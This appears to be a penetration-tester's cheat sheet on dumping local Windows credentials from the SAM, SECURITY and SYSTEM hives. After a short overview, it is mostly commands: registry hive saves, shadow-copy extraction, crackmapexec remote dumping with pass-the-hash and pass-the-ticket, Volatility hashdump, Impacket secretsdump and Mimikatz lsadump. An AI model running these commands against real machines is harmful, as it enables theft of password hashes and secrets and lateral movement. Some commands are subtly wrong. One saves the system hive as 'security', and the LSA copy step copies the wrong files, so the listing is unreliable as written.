Local credentials (SAM and LSA)
Overview
SAM (Security Accounts Manager) and LSA (Local Security Authority) are two important databases used in the security architecture of Windows operating systems.
The SAM database is a part of the Windows registry and stores information related to local user accounts and security policies. It contains data such as usernames, passwords (hashed), account status, and group membership. Windows uses SAM to perform local user authentication and enforce security policies on a per-machine basis.
The LSA database, on the other hand, is a component of the Windows security subsystem that provides security-related services to applications and other system components. It stores security-related information such as authentication credentials, security policy settings, and account lockout policies. The LSA database is responsible for enforcing security policies, authenticating users, and managing security tokens for applications and system services.
In summary, while the SAM database is primarily concerned with managing local user accounts and security policies, the LSA database provides a broader range of security-related services and is used by various components of the Windows operating system.
SAM
Contains local cached credentials.
Security
Stores clear text credentials, password hashes, security tokens etc.
System
Store enough info to decrypt the SAM and LSA hives.
Obtaining the SAM and LSA database
To be able to decrypt the SAM database, we'll require the sam and system hive where the encryption key is stored.
To be able to decrypt the LSA database, we'll require the security and system hive where the encryption key is stored.
reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\system securityCreating a shadow copy.
wmic shadowcopy call create Volume='C:\'List existing shadow copies.
vssadmin list shadowsCopying the SAM database.
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\users\offsec.corp1\Downloads\samcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\users\offsec.corp1\Downloads\systemCopying the LSA databases.
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\users\offsec.corp1\Downloads\securitycopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\users\offsec.corp1\Downloads\systemObtaining SAM
crackmapexec smb 192.168.1.0/24 -u {username} -p {password} --samObtaining LSA
crackmapexec smb 192.168.1.0/24 -u {username} -p {password} --lsaFull memory dump and Volatility
Obtain memory dump from Magnet Ram Capture or other forensics tools.
Using volatility to read memory and obtain credentials
py .\vol.py -f C:\Users\admin\ram_memdump.raw windows.hashdump.HashDumpDecoding the SAM and LSA database
Impacket's secretsdump is a Python tool used for extracting authentication credentials from Windows systems. It can extract password hashes from the Security Account Manager (SAM) database and Kerberos tickets from the Local Security Authority (LSA) database.
# Remote dumping of SAM & LSA secrets
secretsdump.py 'DOMAIN/USER:PASSWORD@TARGET'
# Remote dumping of SAM & LSA secrets (pass-the-hash)
secretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'
# Remote dumping of SAM & LSA secrets (pass-the-ticket)
secretsdump.py -k 'DOMAIN/USER@TARGET'
# Offline dumping of LSA secrets from exported hives
secretsdump.py -security '/path/to/security.save' -system '/path/to/system.save' LOCAL
# Offline dumping of SAM secrets from exported hives
secretsdump.py -sam '/path/to/sam.save' -system '/path/to/system.save' LOCAL
# Offline dumping of SAM & LSA secrets from exported hives
secretsdump.py -sam '/path/to/sam.save' -security '/path/to/security.save' -system '/path/to/system.save' LOCALMimikatz is a powerful Windows post-exploitation tool that can extract sensitive information such as password hashes, plaintext passwords, and Kerberos tickets from memory on a compromised system.
# Local dumping of SAM secrets on the target
lsadump::sam
# Offline dumping of SAM secrets from exported hives
lsadump::sam /sam:'C:\path\to\sam.save' /system:'C:\path\to\system.save'
# Local dumping of LSA secrets on the target
lsadump::secrets
# Offline dumping LSA secrets from exported hives
lsadump::secrets /security:'C:\path\to\security.save' /system:'C:\path\to\system.save'CrackMapExec (Python) can be used to remotely dump SAM and LSA secrets, on multiple hosts. It offers several authentication methods like pass-the-hash (NTLM), or pass-the-ticket (Kerberos)
# Remote dumping of SAM/LSA secrets
crackmapexec smb $TARGETS -d $DOMAIN -u $USER -p $PASSWORD --sam/--lsa
# Remote dumping of SAM/LSA secrets (local user authentication)
crackmapexec smb $TARGETS --local-auth -u $USER -p $PASSWORD --sam/--lsa
# Remote dumping of SAM/LSA secrets (pass-the-hash)
crackmapexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --sam/--lsa
# Remote dumping of SAM/LSA secrets (pass-the-ticket)
crackmapexec smb $TARGETS --kerberos --sam/--lsaReferences
Last updated